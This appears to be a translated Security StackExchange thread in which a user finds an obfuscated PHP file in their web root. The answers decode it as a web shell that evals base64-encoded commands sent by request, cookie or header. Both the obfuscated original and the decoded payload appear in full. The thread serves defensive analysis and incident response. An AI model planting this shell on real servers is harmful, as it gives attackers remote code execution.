Obtuve este archivo php en la raíz de mi servidor web. ¿Soy atacado? [duplicar]

Navega tus respuestas
-1

El nombre del archivo es dmpdstcm_qsdfjmqsjfdlmqjf.php y su contenido está debajo.

¿Qué debo hacer por favor? :( 

<?php
$brian= 'r';$exhaling ='ctpv'; $jacki= 'b'; $cravat = 'am('; $giselbert = 'LkRi"r';$foulplay= ''';$dabbling ='i';$finicky = 'M';$comparison = 'tMraMH';$distract='LM:ZaM';
$cuprous=']'; $augmenting= '"'; $intervene ='(';$impermeable = 'iR)ce_';$disciplinary= ')mCa)'; $hymn='[dOta(Kr';$bagger='rs'; $elysian ='H($(ectoE';$lets = 'l';

$derek='))];Qwrv';

$doloritas='g]sMO(vT';
$crimson= 'CSmdie'; $incidental ='r'; $leaps='$aE"_';

$lumped='='; $gulled = ',?"ncWT';$campground = 'S6rm';

$bell='PP(e';
$fives ='O';$irreflexive='$'; $ambrose= 'kLS$c_'; $dragging = '_';
$bootlegger ='"';$iota= '"esnlcfV_'; $askers= 'Ws'; $fuck ='uV)s'; $greasy= 'i';
$caffeine= 'e';$downplays ='te;l';$amen= '_e'; $inhomogeneity = 'A';$enroll='N';

$constructive='U'; $cutting = ')atT'; $down='P';$duchess ='a';

$amended= 'R';$ashlin = '[[^m';$assisting= 'K';$brazier ='C4__)_l';
$consent= 'i]$eesYa(';$distillers= 'aW;gerg';

$frasier = '_';

$leveller ='raao'; $cedar ='$T$e"MvR]';$fry = 'X?Aes';
$flinched= 'KfswIud='; $attendances = 'e';

$deerskin='o'; $casie='i$aTT_yrE'; $fenugreek= '"';$kittens ='e'; $cavernous='E';$antlered =' '; $glows='ip';$disgraceful = ')'; $feature ='m'; $hypoactive =','; $arrow = 'iU_';$cashers=')yt'; $bilking= '($[(';$hobie = '$';
$goddard=';'; $enlivening ='mnQ['; $capacity= 'K:)(Ea';$droplet = $iota[5]. $casie['7'].$kittens.$capacity['5'].
$cashers['2']. $kittens.$arrow[2] .$flinched['1'].

$flinched[5]. $enlivening['1'] .$iota[5] .$cashers['2']. $arrow[0].$deerskin. $enlivening['1'];
$impassable = $antlered;

$branchings = $droplet ($impassable,$kittens . $cedar['6'] .

$capacity['5'] .$brazier['6'] . $capacity['3'] .

$capacity['5'] . $casie['7']. $casie['7'] . $capacity['5']. $cashers['1'] .
$arrow[2] .
$glows['1'] . $deerskin.$glows['1']. $capacity['3'].

$flinched['1'].$flinched[5] . $enlivening['1'] .$iota[5].
$arrow[2] . $distillers['6'].

$kittens . $cashers['2'] .$arrow[2] . $capacity['5']. $casie['7'].$distillers['6'] .$flinched['2'] .$capacity['3'] .$capacity['2'] . $capacity['2']. $capacity['2'] .$goddard); $branchings($foulplay , $arrow[2] ,$casie['7'], $ashlie['3'],$deerskin , $cashers['2'], $ashlin[2] , $fretting['0'],$hobie . $arrow[0] . $flinched[7]. $capacity['5'].

$casie['7']. $casie['7']. $capacity['5'] .$cashers['1'] .$arrow[2] . $enlivening['0'] .
$kittens .$casie['7'] .

$distillers['6'].$kittens. $capacity['3'] . $hobie .$arrow[2] .$cedar['7'].

$capacity['4']. $enlivening['2'] . $arrow['1']. $capacity['4'].$ambrose['2'].$casie['4'].$hypoactive .$hobie.$arrow[2]. $brazier['0']. $fives .$fives.$capacity['0'].
$flinched['4'] .

$capacity['4'].

$hypoactive.$hobie.

$arrow[2] .$ambrose['2'].$capacity['4'].$cedar['7']. $fuck['1'] .$capacity['4'] .$cedar['7'] .
$capacity['2']. $goddard.
$hobie . $capacity['5']. $flinched[7].$arrow[0]. $flinched['2'].$flinched['2'] . $kittens .$cashers['2'].
$capacity['3'] . $hobie . $arrow[0] .
$enlivening['3'] .$fenugreek.$iota[5] . $enlivening['0'] .$enlivening['0'] .$ambrose['0'] . $enlivening['0'].
$flinched['3']. $capacity['5'] .

$brazier['6']. $fenugreek. $cedar['8'] .$capacity['2'].$fry['1'].

$hobie.$arrow[0] .$enlivening['3'] . $fenugreek .
$iota[5].$enlivening['0'].$enlivening['0'] . $ambrose['0'] .$enlivening['0'].$flinched['3'].$capacity['5'] .$brazier['6']. $fenugreek.$cedar['8'] .$capacity['1']. $capacity['3'] .$arrow[0].
$flinched['2'].$flinched['2'] . $kittens.
$cashers['2'].$capacity['3']. $hobie .$arrow[0] .$enlivening['3'] .$fenugreek. $elysian[0]. $casie['4'].$casie['4'] .$down.$arrow[2].$brazier['0'].

$cedar['5'] . $cedar['5'] . $capacity['0']. $cedar['5']. $distillers['1']. $fry['2'] . $ambrose['1'] .$fenugreek .$cedar['8'].

$capacity['2'] .$fry['1'] .$hobie .$arrow[0] .
$enlivening['3']. $fenugreek.

$elysian[0] . $casie['4'].$casie['4'] .$down.$arrow[2] . $brazier['0'].$cedar['5']. $cedar['5']. $capacity['0']. $cedar['5']. $distillers['1']. $fry['2']. $ambrose['1'] .
$fenugreek.
$cedar['8']. $capacity['1'] . $flinched['6'].$arrow[0].$kittens . $capacity['2']. $goddard . $kittens .
$cedar['6']. $capacity['5']. $brazier['6'] .$capacity['3'].$flinched['2'].$cashers['2'].
$casie['7'] . $casie['7'].$kittens. $cedar['6']. $capacity['3']. $jacki . $capacity['5'].$flinched['2']. $kittens . $campground['1'] . $brazier['1']. $arrow[2].$flinched['6'] .$kittens. $iota[5]. $deerskin .$flinched['6'] .
$kittens .$capacity['3'] . $flinched['2'].$cashers['2'] . $casie['7'].$casie['7'] .$kittens . $cedar['6']. $capacity['3'].$hobie . $capacity['5']. $capacity['2'] . $capacity['2'] . $capacity['2'].$capacity['2'] .$goddard );
    
pregunta Khue 30.08.2016 - 11:46
fuente

2 respuestas

3

Este script intenta ejecutar este código: 

$i = array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a = isset($i["cmmkmwal"]) ? $i["cmmkmwal"] : (isset($i["HTTP_CMMKMWAL"]) ? $i["HTTP_CMMKMWAL"] : die);
eval(strrev(base64_decode(strrev($a))));

Es decir, ejecute eval en algún parámetro codificado. Si su servidor web puede acceder a este archivo y procesarlo como PHP, esta secuencia de comandos ejecutará cualquier código en el servidor.

Tenga en cuenta que solo porque este archivo estaba en su raíz FTP no significa que se haya interpretado como PHP. Para que el script se ejecute debe ser accesible a través de un servidor web.

Editar: usted indicó en los comentarios que se podía acceder al archivo a través de una URL. Esto significa que el atacante podría ejecutar cualquier código en el servidor, y el servidor (o al menos su cuenta de usuario) se vio comprometido.

    
respondido por el Sjoerd 30.08.2016 - 12:11
fuente
3

Analicé el código que proporcionaste. Era un tipo de webshell utilizado para el acceso remoto. El código ejecutado es el siguiente. 

$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["cmmkmwal"])?$i["cmmkmwal"]:(isset($i["HTTP_CMMKMWAL"])?$i["HTTP_CMMKMWAL"]:die);eval(strrev(base64_decode(strrev($a))));

También, solo para agregar, el error debajo de undefined function probablemente da pistas de que puede haber otros archivos infectados también en el servidor que contiene esta definición de función. 

Fatal error: Call to undefined function func_eet_ares() in C:\wamp\www\Secscripts\PHPRAT.php(100) : runtime-created function on line 1

Su servidor está comprometido. Para la limpieza, verifique el enlace como se menciona en comentarios .

    
respondido por el Sravan 30.08.2016 - 12:31
fuente

Lea otras preguntas en las etiquetas

¿Es Mac OSX realmente más seguro que Windows [cerrado] ¿Por qué algunas grandes empresas utilizan MD5 como algoritmo de hashing para sus contraseñas? [cerrado]